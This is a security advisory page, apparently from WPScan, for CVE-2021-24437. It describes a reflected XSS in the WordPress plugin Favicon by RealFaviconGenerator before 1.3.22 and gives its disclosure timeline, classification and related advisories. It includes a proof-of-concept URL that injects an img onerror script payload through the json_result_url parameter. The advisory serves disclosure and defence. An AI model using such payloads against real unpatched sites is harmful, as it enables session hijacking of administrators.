Favicon by RealFaviconGenerator < 1.3.22 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24437 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape one of its parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting (XSS) which is executed in the context of a logged administrator.

Timeline (WPScanTeam):
June 28th, 2021 - Details sent to vendor
July 9th, 2021 - Escalated to WP due to lack of response from vendor
July 27th, 2021 - No update, disclosing
August 9th, 2021 - v1.3.22 released, fixing the issue

Proof of Concept

Affected parameter: json_result_url

https://example.com/wp-admin/themes.php?page=favicon-by-realfavicongenerator%2Fadmin%2Fclass-favicon-by-realfavicongenerator-admin.phpfavicon_appearance_menu&json_result_url=%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Affects Plugins

favicon-by-realfavicongenerator

Fixed in 1.3.22

References

CVE

URL

https://wordpress.org/support/topic/wp-engine-security-plugin-vulnerability-notification/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

renniepak

Submitter

renniepak

Submitter twitter

Verified

Yes

WPVDB ID

ed9d26be-cc96-4274-a05b-0b7ad9d8cfd9

Timeline

Publicly Published

2021-07-27 (about 2 years ago)

Added

2021-07-27 (about 2 years ago)

Last Updated

2021-08-10 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

RokBox <= 2.13 - jwplayer/jwplayer.swf abouttext Parameter XSS

Published

2014-08-08

Title

Job Board by BestWebSoft < 1.0.1 - Admin+ Stored XSS

Published

2022-08-10

Title

Best Payments Plugin for WP < 4.2.1 - Unauthenticated Stored Cross-Site Scripting

Published

2023-07-07

Title

Video Gallery < 1.3.13 - Admin+ Stored XSS

Published

2016-06-22

Title

WordPress File Monitor - Stored Cross-Site Scripting (XSS)